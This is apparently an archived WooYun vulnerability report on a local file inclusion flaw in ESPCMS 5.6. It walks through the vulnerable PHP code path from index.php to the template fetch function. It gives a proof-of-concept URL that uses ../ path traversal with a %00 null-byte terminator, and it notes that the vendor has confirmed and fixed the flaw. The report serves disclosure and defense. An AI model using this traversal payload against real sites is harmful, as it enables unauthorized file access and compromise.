乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-04-08: 细节已通知厂商并且等待厂商处理中 2013-04-08: 厂商已经确认,细节仅向厂商公开 2013-04-18: 细节向核心白帽子及相关领域专家公开 2013-04-23: 厂商提前公开漏洞,细节向公众公开
包含
adminsoft/index.php
$archive = indexget('archive', 'R');$archive = empty($archive) ? 'adminuser' : $archive;$action = indexget('action', 'R');$action = empty($action) ? 'login' : $action;include admin_ROOT . adminfile . "/control/$archive.php";// 包含产生 good nice$control = new important();$action = 'on' . $action;if (method_exists($control, $action)) {$control->$action();} else { exit('错误:系统方法错误!');}
首先看index.php02 ///省略无关代码03 $archive = indexget('ac', 'R'); //ac04 $action = indexget('at', 'R'); //at05 ///省略无关代码06 if (empty($archive) || empty($action)) {07 include admin_ROOT . 'interface/public.php';08 $mainlist = new mainpage();09 if (method_exists($mainlist, 'in_index')) {10 $mainlist->in_index();11 } else {12 exit('Access error!');13 }14 } else {15 if (in_array($archive, array('article', 'forum', 'search', 'bbssearch', 'forummain', 'messmain', 'special', 'respond', 'public', 'scriptout', 'enquiry', 'enquirymain', 'form', 'formmain', 'ordermain', 'membermain', 'member', 'forum', 'order'))) { //强制,首页包含木有了16 $action = 'in_' . $action; /in_$ 函数17 if (!file_exists(admin_ROOT . "interface/$archive.php")) { //跟进18 exit('Access error!');19 }20 include admin_ROOT . "interface/$archive.php";21 $mainlist = new mainpage();22 if (method_exists($mainlist, $action)) {23 $mainlist->$action();24 } else {25 exit('Access error!');26 }27 } else {28 exit('Access error!');29 }30 }31 ///省略无关代码32 跟进到interface/enquity文件33 ///省略无关代码34 $filename = $this->fun->accept('filename', 'G'); //filename变量35 $filename = empty($filename) ? 'list' : $filename;36 ///省略无关代码37 $output = $this->pagetemplate->fetch($lng . '/lib/' . $filename); '38 ///省略无关代码39 ///跟进函数库查看40 function fetch($tpl_file, $cache_fileID = null, $outHTML = null) {41 if (!empty($outHTML)) {42 $out = $this->gettemprequire($outHTML);43 return $out;44 }45 require_once 'ectemplates_parser.php';46 47 if ($this->libfile) {48 $tpl_file = $this->templatesDIR . $tpl_file . '.html'; //html49 }50 51 $template_file = $this->tpl_dir . $tpl_file;52 53 $parsed_file = $this->tpl_c_dir . md5($tpl_file) . '.php';54 55 http://127.0.0.1/espcms_utf8_5.6.13.03.14_b/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00
http://127.0.0.1/espcms_utf8_5.6.13.03.14_b/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00
过滤特殊字符
危害等级:高
漏洞Rank:15
确认时间:2013-04-08 18:42
感谢,我们会尽快修复!!!
2013-04-23:已修正此漏洞!下载地址http://www.ecisp.cn/html/cn/download/